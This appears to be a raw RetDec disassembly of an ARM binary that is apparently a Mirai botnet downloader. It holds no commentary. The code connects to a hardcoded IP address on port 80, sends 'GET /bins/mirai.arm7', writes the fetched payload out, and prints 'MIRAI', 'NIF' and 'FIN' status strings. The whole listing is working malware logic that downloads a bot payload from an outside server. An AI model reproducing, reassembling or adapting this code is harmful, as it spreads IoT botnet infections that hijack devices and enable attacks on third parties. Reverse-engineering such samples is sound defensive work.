;;
;; This file was generated by the Retargetable Decompiler
;; Website: https://retdec.com
;; Copyright (c) 2018 Retargetable Decompiler <info@retdec.com>
;;
;; Decompilation date: 2018-03-25 01:20:03
;; Architecture: arm
;;

;;
;; Code Segment
;;

; section: seg0000
; data inside code section at 0x8000 -- 0x80bf
0x8000:    7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00   |.ELF............|
0x8010:    02 00 28 00 01 00 00 00  ac 83 00 00 34 00 00 00   |..(.........4...|
0x8020:    c8 04 00 00 02 00 00 04  34 00 20 00 04 00 28 00   |........4. ...(.|
0x8030:    07 00 06 00 01 00 00 00  00 00 00 00 00 80 00 00   |................|
0x8040:    00 80 00 00 70 04 00 00  70 04 00 00 05 00 00 00   |....p...p.......|
0x8050:    00 80 00 00 01 00 00 00  70 04 00 00 70 04 01 00   |........p...p...|
0x8060:    70 04 01 00 10 00 00 00  10 00 00 00 06 00 00 00   |p...............|
0x8070:    00 80 00 00 07 00 00 00  70 04 00 00 70 04 01 00   |........p...p...|
0x8080:    70 04 01 00 00 00 00 00  08 00 00 00 04 00 00 00   |p...............|
0x8090:    04 00 00 00 51 e5 74 64  00 00 00 00 00 00 00 00   |....Q.td........|
0x80a0:    00 00 00 00 00 00 00 00  00 00 00 00 07 00 00 00   |................|
0x80b0:    04 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
; function: function_80c0 at 0x80c0 -- 0x80e3
0x80c0:    01 38 83 e1   	orr r3, r3, r1, lsl #16
0x80c4:    00 3c 83 e1   	orr r3, r3, r0, lsl #24
0x80c8:    02 34 83 e1   	orr r3, r3, r2, lsl #8
0x80cc:    03 0c a0 e1   	lsl r0, r3, #0x18
0x80d0:    02 08 80 e1   	orr r0, r0, r2, lsl #16
0x80d4:    ff 28 03 e2   	and r2, r3, #0xff0000
0x80d8:    22 04 80 e1   	orr r0, r0, r2, lsr #8
0x80dc:    23 0c 80 e1   	orr r0, r0, r3, lsr #24
0x80e0:    1e ff 2f e1   	bx lr
; function: function_80e4 at 0x80e4 -- 0x8103
0x80e4:    04 e0 2d e5   	str lr, [sp, #-4]!
0x80e8:    00 10 a0 e1   	mov r1, r0
0x80ec:    04 d0 4d e2   	sub sp, sp, #4
0x80f0:    01 00 a0 e3   	mov r0, #1
0x80f4:    ad 00 00 eb   	bl #0x83b0 <function_83b0>
0x80f8:    04 d0 8d e2   	add sp, sp, #4
0x80fc:    04 e0 9d e4   	pop {lr}
0x8100:    1e ff 2f e1   	bx lr
; function: function_8104 at 0x8104 -- 0x8123
0x8104:    04 e0 2d e5   	str lr, [sp, #-4]!
0x8108:    00 10 a0 e1   	mov r1, r0
0x810c:    04 d0 4d e2   	sub sp, sp, #4
0x8110:    06 00 a0 e3   	mov r0, #6
0x8114:    a5 00 00 eb   	bl #0x83b0 <function_83b0>
0x8118:    04 d0 8d e2   	add sp, sp, #4
0x811c:    04 e0 9d e4   	pop {lr}
0x8120:    1e ff 2f e1   	bx lr
; function: function_8124 at 0x8124 -- 0x814f
0x8124:    04 e0 2d e5   	str lr, [sp, #-4]!
0x8128:    01 c0 a0 e1   	mov ip, r1
0x812c:    02 30 a0 e1   	mov r3, r2
0x8130:    00 10 a0 e1   	mov r1, r0
0x8134:    04 d0 4d e2   	sub sp, sp, #4
0x8138:    0c 20 a0 e1   	mov r2, ip
0x813c:    05 00 a0 e3   	mov r0, #5
0x8140:    9a 00 00 eb   	bl #0x83b0 <function_83b0>
0x8144:    04 d0 8d e2   	add sp, sp, #4
0x8148:    04 e0 9d e4   	pop {lr}
0x814c:    1e ff 2f e1   	bx lr
; function: function_8150 at 0x8150 -- 0x817f
0x8150:    04 e0 2d e5   	str lr, [sp, #-4]!
0x8154:    01 c0 a0 e1   	mov ip, r1
0x8158:    02 30 a0 e1   	mov r3, r2
0x815c:    00 10 a0 e1   	mov r1, r0
0x8160:    04 d0 4d e2   	sub sp, sp, #4
0x8164:    0c 20 a0 e1   	mov r2, ip
0x8168:    0c 00 9f e5   	ldr r0, [pc, #0xc]
0x816c:    8f 00 00 eb   	bl #0x83b0 <function_83b0>
0x8170:    04 d0 8d e2   	add sp, sp, #4
0x8174:    04 e0 9d e4   	pop {lr}
0x8178:    1e ff 2f e1   	bx lr
; data inside code section at 0x817c -- 0x8180
0x817c:    1b 01 00 00                                        |....            |
; function: function_8180 at 0x8180 -- 0x81ab
0x8180:    04 e0 2d e5   	str lr, [sp, #-4]!
0x8184:    01 c0 a0 e1   	mov ip, r1
0x8188:    02 30 a0 e1   	mov r3, r2
0x818c:    00 10 a0 e1   	mov r1, r0
0x8190:    04 d0 4d e2   	sub sp, sp, #4
0x8194:    0c 20 a0 e1   	mov r2, ip
0x8198:    04 00 a0 e3   	mov r0, #4
0x819c:    83 00 00 eb   	bl #0x83b0 <function_83b0>
0x81a0:    04 d0 8d e2   	add sp, sp, #4
0x81a4:    04 e0 9d e4   	pop {lr}
0x81a8:    1e ff 2f e1   	bx lr
; function: function_81ac at 0x81ac -- 0x81d7
0x81ac:    04 e0 2d e5   	str lr, [sp, #-4]!
0x81b0:    01 c0 a0 e1   	mov ip, r1
0x81b4:    02 30 a0 e1   	mov r3, r2
0x81b8:    00 10 a0 e1   	mov r1, r0
0x81bc:    04 d0 4d e2   	sub sp, sp, #4
0x81c0:    0c 20 a0 e1   	mov r2, ip
0x81c4:    03 00 a0 e3   	mov r0, #3
0x81c8:    78 00 00 eb   	bl #0x83b0 <function_83b0>
0x81cc:    04 d0 8d e2   	add sp, sp, #4
0x81d0:    04 e0 9d e4   	pop {lr}
0x81d4:    1e ff 2f e1   	bx lr
; function: function_81d8 at 0x81d8 -- 0x8207
0x81d8:    04 e0 2d e5   	str lr, [sp, #-4]!
0x81dc:    01 c0 a0 e1   	mov ip, r1
0x81e0:    02 30 a0 e1   	mov r3, r2
0x81e4:    00 10 a0 e1   	mov r1, r0
0x81e8:    04 d0 4d e2   	sub sp, sp, #4
0x81ec:    0c 20 a0 e1   	mov r2, ip
0x81f0:    0c 00 9f e5   	ldr r0, [pc, #0xc]
0x81f4:    6d 00 00 eb   	bl #0x83b0 <function_83b0>
0x81f8:    04 d0 8d e2   	add sp, sp, #4
0x81fc:    04 e0 9d e4   	pop {lr}
0x8200:    1e ff 2f e1   	bx lr
; data inside code section at 0x8204 -- 0x8208
0x8204:    19 01 00 00                                        |....            |
; function: function_8208 at 0x8208 -- 0x8387
0x8208:    f0 41 2d e9   	push {r4, r5, r6, r7, r8, lr}
0x820c:    74 31 9f e5   	ldr r3, [pc, #0x174]
0x8210:    98 d0 4d e2   	sub sp, sp, #0x98
0x8214:    00 80 a0 e3   	mov r8, #0
0x8218:    00 00 00 ea   	b #0x8220 <function_8208+0x18>
0x821c:    01 80 88 e2   	add r8, r8, #1
0x8220:    01 60 53 e5   	ldrb r6, [r3, #-1]
0x8224:    00 00 56 e3   	cmp r6, #0
0x8228:    01 30 83 e2   	add r3, r3, #1
0x822c:    fa ff ff 1a   	bne #0x821c <function_8208+0x14>
0x8230:    54 11 9f e5   	ldr r1, [pc, #0x154]
0x8234:    06 20 a0 e3   	mov r2, #6
0x8238:    01 00 a0 e3   	mov r0, #1
0x823c:    cf ff ff eb   	bl #0x8180 <function_8180>
0x8240:    02 c0 a0 e3   	mov ip, #2
0x8244:    3e 30 a0 e3   	mov r3, #0x3e
0x8248:    a5 10 a0 e3   	mov r1, #0xa5
0x824c:    1d 20 a0 e3   	mov r2, #0x1d
0x8250:    b4 c8 cd e1   	strh ip, [sp, #0x84]
0x8254:    b9 00 a0 e3   	mov r0, #0xb9
0x8258:    05 ca a0 e3   	mov ip, #0x5000
0x825c:    b6 c8 cd e1   	strh ip, [sp, #0x86]
0x8260:    96 ff ff eb   	bl #0x80c0 <function_80c0>
0x8264:    24 11 9f e5   	ldr r1, [pc, #0x124]
0x8268:    88 00 8d e5   	str r0, [sp, #0x88]
0x826c:    20 21 9f e5   	ldr r2, [pc, #0x120]
0x8270:    20 01 9f e5   	ldr r0, [pc, #0x120]
0x8274:    aa ff ff eb   	bl #0x8124 <function_8124>
0x8278:    01 10 a0 e3   	mov r1, #1
0x827c:    00 70 a0 e1   	mov r7, r0
0x8280:    06 20 a0 e1   	mov r2, r6
0x8284:    02 00 a0 e3   	mov r0, #2
0x8288:    d2 ff ff eb   	bl #0x81d8 <function_81d8>
0x828c:    01 00 70 e3   	cmn r0, #1
0x8290:    01 00 77 13   	cmnne r7, #1
0x8294:    00 50 a0 e1   	mov r5, r0
0x8298:    01 00 a0 03   	moveq r0, #1
0x829c:    90 ff ff 0b   	bleq #0x80e4
0x82a0:    05 00 a0 e1   	mov r0, r5
0x82a4:    84 10 8d e2   	add r1, sp, #0x84
0x82a8:    10 20 a0 e3   	mov r2, #0x10
0x82ac:    a7 ff ff eb   	bl #0x8150 <function_8150>
0x82b0:    00 40 50 e2   	subs r4, r0, #0
0x82b4:    05 00 00 aa   	bge #0x82d0 <function_8208+0xc8>
0x82b8:    01 00 a0 e3   	mov r0, #1
0x82bc:    d8 10 9f e5   	ldr r1, [pc, #0xd8]
0x82c0:    04 20 a0 e3   	mov r2, #4
0x82c4:    ad ff ff eb   	bl #0x8180 <function_8180>
0x82c8:    00 00 64 e2   	rsb r0, r4, #0
0x82cc:    84 ff ff eb   	bl #0x80e4 <function_80e4>
0x82d0:    1d 40 88 e2   	add r4, r8, #0x1d
0x82d4:    05 00 a0 e1   	mov r0, r5
0x82d8:    c0 10 9f e5   	ldr r1, [pc, #0xc0]
0x82dc:    04 20 a0 e1   	mov r2, r4
0x82e0:    a6 ff ff eb   	bl #0x8180 <function_8180>
0x82e4:    04 00 50 e1   	cmp r0, r4
0x82e8:    03 00 a0 13   	movne r0, #3
0x82ec:    7c ff ff 1b   	blne #0x80e4
0x82f0:    ac 80 9f e5   	ldr r8, [pc, #0xac]
0x82f4:    06 40 a0 e1   	mov r4, r6
0x82f8:    97 60 8d e2   	add r6, sp, #0x97
0x82fc:    06 10 a0 e1   	mov r1, r6
0x8300:    01 20 a0 e3   	mov r2, #1
0x8304:    05 00 a0 e1   	mov r0, r5
0x8308:    a7 ff ff eb   	bl #0x81ac <function_81ac>
0x830c:    01 00 50 e3   	cmp r0, #1
0x8310:    04 00 a0 e3   	mov r0, #4
0x8314:    72 ff ff 1b   	blne #0x80e4
0x8318:    97 30 dd e5   	ldrb r3, [sp, #0x97]
0x831c:    04 44 83 e1   	orr r4, r3, r4, lsl #8
0x8320:    08 00 54 e1   	cmp r4, r8
0x8324:    f4 ff ff 1a   	bne #0x82fc <function_8208+0xf4>
0x8328:    04 40 8d e2   	add r4, sp, #4
0x832c:    04 10 a0 e1   	mov r1, r4
0x8330:    80 20 a0 e3   	mov r2, #0x80
0x8334:    05 00 a0 e1   	mov r0, r5
0x8338:    9b ff ff eb   	bl #0x81ac <function_81ac>
0x833c:    00 20 50 e2   	subs r2, r0, #0
0x8340:    04 10 a0 e1   	mov r1, r4
0x8344:    07 00 a0 e1   	mov r0, r7
0x8348:    01 00 00 da   	ble #0x8354 <function_8208+0x14c>
0x834c:    8b ff ff eb   	bl #0x8180 <function_8180>
0x8350:    f5 ff ff ea   	b #0x832c <function_8208+0x124>
0x8354:    05 00 a0 e1   	mov r0, r5
0x8358:    69 ff ff eb   	bl #0x8104 <function_8104>
0x835c:    07 00 a0 e1   	mov r0, r7
0x8360:    67 ff ff eb   	bl #0x8104 <function_8104>
0x8364:    3c 10 9f e5   	ldr r1, [pc, #0x3c]
0x8368:    04 20 a0 e3   	mov r2, #4
0x836c:    01 00 a0 e3   	mov r0, #1
0x8370:    82 ff ff eb   	bl #0x8180 <function_8180>
0x8374:    05 00 a0 e3   	mov r0, #5
0x8378:    59 ff ff eb   	bl #0x80e4 <function_80e4>
0x837c:    98 d0 8d e2   	add sp, sp, #0x98
0x8380:    f0 41 bd e8   	pop {r4, r5, r6, r7, r8, lr}
0x8384:    1e ff 2f e1   	bx lr
; data inside code section at 0x8388 -- 0x83ab
0x8388:    21 84 00 00 28 84 00 00  41 02 00 00 ff 01 00 00   |!...(...A.......|
0x8398:    30 84 00 00 3c 84 00 00  44 84 00 00 0a 0d 0a 0d   |0...<...D.......|
0x83a8:    68 84 00 00                                        |h...            |
; function: entry_point at 0x83ac -- 0x83af
0x83ac:    95 ff ff ea   	b #0x8208 <function_8208>
; function: function_83b0 at 0x83b0 -- 0x840f
0x83b0:    0d c0 a0 e1   	mov ip, sp
0x83b4:    f0 00 2d e9   	push {r4, r5, r6, r7}
0x83b8:    00 70 a0 e1   	mov r7, r0
0x83bc:    01 00 a0 e1   	mov r0, r1
0x83c0:    02 10 a0 e1   	mov r1, r2
0x83c4:    03 20 a0 e1   	mov r2, r3
0x83c8:    78 00 9c e8   	ldm ip, {r3, r4, r5, r6}
0x83cc:    00 00 00 ef   	svc #0
0x83d0:    f0 00 bd e8   	pop {r4, r5, r6, r7}
0x83d4:    01 0a 70 e3   	cmn r0, #0x1000
0x83d8:    0e f0 a0 31   	movlo pc, lr
0x83dc:    ff ff ff ea   	b #0x83e0
0x83e0:    04 e0 2d e5   	str lr, [sp, #-4]!
0x83e4:    1c 20 9f e5   	ldr r2, [pc, #0x1c]
0x83e8:    00 30 a0 e1   	mov r3, r0
0x83ec:    02 20 9f e7   	ldr r2, [pc, r2]
0x83f0:    06 00 00 eb   	bl #0x8410 <function_8410>
0x83f4:    00 30 63 e2   	rsb r3, r3, #0
0x83f8:    02 30 80 e7   	str r3, [r0, r2]
0x83fc:    00 00 e0 e3   	mvn r0, #0
0x8400:    04 e0 9d e4   	pop {lr}
0x8404:    1e ff 2f e1   	bx lr
; data inside code section at 0x8408 -- 0x8410
0x8408:    88 80 00 00 00 00 00 00                            |........        |
; function: function_8410 at 0x8410 -- 0x8417
0x8410:    0f 0a e0 e3   	mvn r0, #0xf000
0x8414:    1f f0 40 e2   	sub pc, r0, #0x1f
; data inside code section at 0x8418 -- 0x846f
0x8418:    00 00 a0 e1 00 00 a0 e1  61                        |........a       |
0x8421:    72 6d 37 00                                        |rm7.            |   "rm7"
0x8425:    00 00 00                                           |...             |
0x8428:    4d 49 52 41 49 0a 00                               |MIRAI..         |   "MIRAI\n"
0x842f:    00                                                 |.               |
0x8430:    57 6f 72 64 6d 65 6d 79  00                        |Wordmemy.       |   "Wordmemy"
0x8439:    00 00 00                                           |...             |
0x843c:    4e 49 46 0a 00                                     |NIF..           |   "NIF\n"
0x8441:    00 00 00                                           |...             |
0x8444:    47 45 54 20 2f 62 69 6e  73 2f 6d 69 72 61 69 2e   |GET /bins/mirai.|   "GET /bins/mirai.arm7 HTTP/1.0\r\n\r\n"
0x8454:    61 72 6d 37 20 48 54 54  50 2f 31 2e 30 0d 0a 0d   |arm7 HTTP/1.0...|
0x8464:    0a 00                                              |..              |
0x8466:    00 00                                              |..              |
0x8468:    46 49 4e 0a 00                                     |FIN..           |   "FIN\n"
0x846d:    00 00 00                                           |...             |

;;
;; Data Segment
;;

; section: seg0001
0x10470:   00 00 00 00 00 00 00 00  00 00 00 00 08 00 00 00   |................|
